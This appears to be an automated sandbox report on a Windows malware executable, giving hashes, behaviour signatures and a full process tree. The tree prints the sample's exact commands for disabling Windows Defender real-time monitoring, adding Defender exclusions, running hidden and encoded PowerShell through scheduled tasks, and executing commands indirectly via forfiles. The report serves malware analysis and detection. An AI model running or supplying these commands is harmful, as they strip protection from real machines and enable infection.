Analysis

  • max time kernel
    137s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2024 22:39

General

  • Target

    15e86cfe059534b5b0323db837fb1b7f73966024600981aa2866653859381de4.exe

  • Size

    7.2MB

  • MD5

    63adbd6c4c4ba8812819d5f9486b7248

  • SHA1

    25405fcacecf21156907c7bc53e6a0f72d9c3818

  • SHA256

    15e86cfe059534b5b0323db837fb1b7f73966024600981aa2866653859381de4

  • SHA512

    80a07522d30b6b16ed1397afe92c43c59f3d74502aa7e1081663293962c633b0316f93b2424643e98a64978b69f72a7ccfc8e1e68584c222d3f92cf2e3233616

  • SSDEEP

    196608:91OWoWE2pClLEFlsmEyjFL1o2WV/1vaIdnXKXYuA:3ORWNCigY5L1ol5aIdn6IX

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\15e86cfe059534b5b0323db837fb1b7f73966024600981aa2866653859381de4.exe
    "C:\Users\Admin\AppData\Local\Temp\15e86cfe059534b5b0323db837fb1b7f73966024600981aa2866653859381de4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Users\Admin\AppData\Local\Temp\7zS823A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Users\Admin\AppData\Local\Temp\7zS8739.tmp\Install.exe
        .\Install.exe /qvlUdidFDQdc "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2820
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2836
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2840
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2992
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2812
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            PID:2748
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2900
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                7⤵
                  PID:2888
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2904
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                  PID:2832
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:1288
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:2720
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:2960
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2944
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2616
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                4⤵
                • Indirect Command Execution
                PID:2864
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:784
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1496
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2392
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bVxDcMagaMCWGEtnSM" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\duSzjvooavxKzqv\JwhXMqO.exe\" 2x /STdidfA 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • Scheduled Task/Job: Scheduled Task
                PID:2084
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 624
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:2248
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {C7F17EEE-E574-4CEE-B686-C85D59C5CF03} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
            PID:604
            • C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\duSzjvooavxKzqv\JwhXMqO.exe
              C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\duSzjvooavxKzqv\JwhXMqO.exe 2x /STdidfA 525403 /S
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:1072
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                  PID:2244
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    4⤵
                    • Indirect Command Execution
                    PID:1628
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1564
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        6⤵
                          PID:2396
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:1908
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:408
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          6⤵
                            PID:1132
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:376
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          5⤵
                            PID:2528
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              6⤵
                                PID:2324
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:2524
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              5⤵
                                PID:2804
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  6⤵
                                    PID:3012
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                PID:1968
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:2320
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1036
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1436
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gFGKVaDgR" /SC once /ST 08:37:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:1032
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gFGKVaDgR"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:820
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /DELETE /F /TN "gFGKVaDgR"
                                3⤵
                                  PID:2408
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1668
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    PID:2728
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                  3⤵
                                    PID:2836
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:1364
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gCMKfVXJr" /SC once /ST 18:54:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2092
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gCMKfVXJr"
                                    3⤵
                                      PID:2624
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gCMKfVXJr"
                                      3⤵
                                        PID:2924
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                        3⤵
                                        • Indirect Command Execution
                                        PID:1044
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2168
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2292
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2684
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2464
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1832
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1812
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:2280
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:3044
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:2380
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:2364
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1900
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C copy nul "C:\Windows\Temp\GTQqDGwYWbPvVFKR\vsWRKiAE\zAhsXGqXXoMSBRMG.wsf"
                                              3⤵
                                                PID:1696
                                              • C:\Windows\SysWOW64\wscript.exe
                                                wscript "C:\Windows\Temp\GTQqDGwYWbPvVFKR\vsWRKiAE\zAhsXGqXXoMSBRMG.wsf"
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:2076
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1416
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2452
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1708
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:408
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1212
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1040
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1304
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2036
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1836
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2296
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VPXvovUKlRyvohVB" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1632
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VPXvovUKlRyvohVB" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1004
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1032
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2356
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1460
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
